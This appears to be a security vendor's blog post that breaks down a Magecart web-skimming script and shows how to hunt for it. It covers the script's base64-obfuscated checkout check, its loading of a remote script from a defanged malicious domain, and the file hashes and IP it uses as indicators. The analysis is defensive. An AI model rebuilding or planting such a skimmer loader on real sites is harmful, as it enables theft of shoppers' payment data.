Magecart is becoming a catch-all term for web skimming attacks and attackers. However, the origin of the term comes from the exploitation of a major flaw in the Magento ecommerce shopping cart module. Security researchers began colloquially referring to the groups behind these attacks by the Magento cart module they were exploiting. The execution of Magecart attacks varies in complexity from a few lines to hundreds and is a tool serving a variety of attackers from low-skill criminals to nation-state actors, like North Korea and Iran. By understanding how the malware functions, we can get a better idea of how to detect whether a site is vulnerable and prepare to detect and defend against this type of attack.
Breaking down the malware
To understand how this malware works, we need to examine the code identified in the malicious application. The first line of code beginning with the if statement is a string examining the URL of the infected subdomain or web page. This line cannot execute successfully on its own but rather it needs input to check against the statement – otherwise, the if statement will be ignored and the script will not run.
Towards the end of the line, we see window.atob, which simply decodes a base64 encoded phrase, followed by a seemingly random set of letters, numbers and symbols. Located within window.atob we find the string ‘Y2hlY2tvdXQ=’ – when decoded from base64, it reveals that the script is searching for the string “checkout” within the URL. We can confirm this through the ‘base64 Decode’ tool in Notepad++ or in the browser using CyberChef.
The next line of code leads with var (short for variable) and creates a script element. The script element is used to embed executable code or data. This is a program within a program that gets called to execute when the conditions are met. If we look a little further into the script, we see another instance of window.atob with an unreadable string of letters and numbers. The same steps mentioned above can be done to quickly decode the text, which this time produces our callout to gstaticapi[.]com/gs.js.
Threat hunting for gstaticapi
To develop a broader understanding of the proliferation of this malware and its impact on services, we can analyze the malware signature through threat exchange platforms and perform reconnaissance on associated domains using domain tools. Using the MD5, SHA-1 or SHA-256 hashing algorithms to generate unique signatures, we can obtain more information about the malware. For this exercise, we have provided a list of Indicators of Compromise from AlienVault and VirusTotal that can be used to aide in threat hunting in support of your blue team operations.
- MD5: 9e21e65f4012dd7a85fdd7aa490b6909
- SHA-1: d1578a23cda1a39586a653d70694b9d697fa1d50
- SHA-256: 5f3d13a33c33dfd56f2ef7336c64d7b7f9d8de59ec6a123560894f7873ed803e
- Vhash: a24b9c2ae535f2747394ab7afefbcf09
We first start with SHA-256 signature in VirusTotal. In the below example, VirusTotal informs us that only 8 AV engines recognize the provided malware signature.
For the next exercise, we will use Google Dorks to search for content related to this hash by searching intext: ’d1578a23cda1a39586a653d70694b9d697fa1d50’. From this, we get 2 hits leading us to Hybrid Analysis, which does a great job of sandboxing malicious files for performing deeper analysis in a safe manner.
Scrolling through this report, we find several additional indicators of malicious activities that we can pivot our search from.
Observing the network traffic via the Network Behavior tool shows this file reached out with TCP to the IP address 220.127.116.11 on port 443. Performing a quick network whois lookup on this IP address will tell us who registered this IP or IP block. The below results show activity beaconing from multiple malware samples and hosts. However, it is possible that the IP address is associated with a cloud service, in which the adversary rented infrastructure for the purposes of this attack. In this instance, the IP itself would not likely be a strong indicator of compromise but pairing it with other signatures could improve detection capabilities.
Through these exercises, we have discovered the impact of this web skimmer and the obfuscation methods used to cover their tracks. The method by which the script is executed from the affected website’s container headers makes the theft of credit card numbers and other valuable information completely invisible to the average end user and is not detected by most antivirus solutions deployed on web servers. With the average data breach taking 207 days to be detected, it is important to have a solution which can identify and prevent these types of attacks.
Ensighten enables organizations to prevent online skimming attacks by providing technology that allows a filter to be placed within a website. This ensures that any data accessed by code, whether first, third or even further down the website supply chain, can only be sent to trusted destinations. Should a library contain skimming malware, the malware would not only be blocked from stealing user data, but the organization would be alerted to its presence – you can learn more about web skimming prevention here.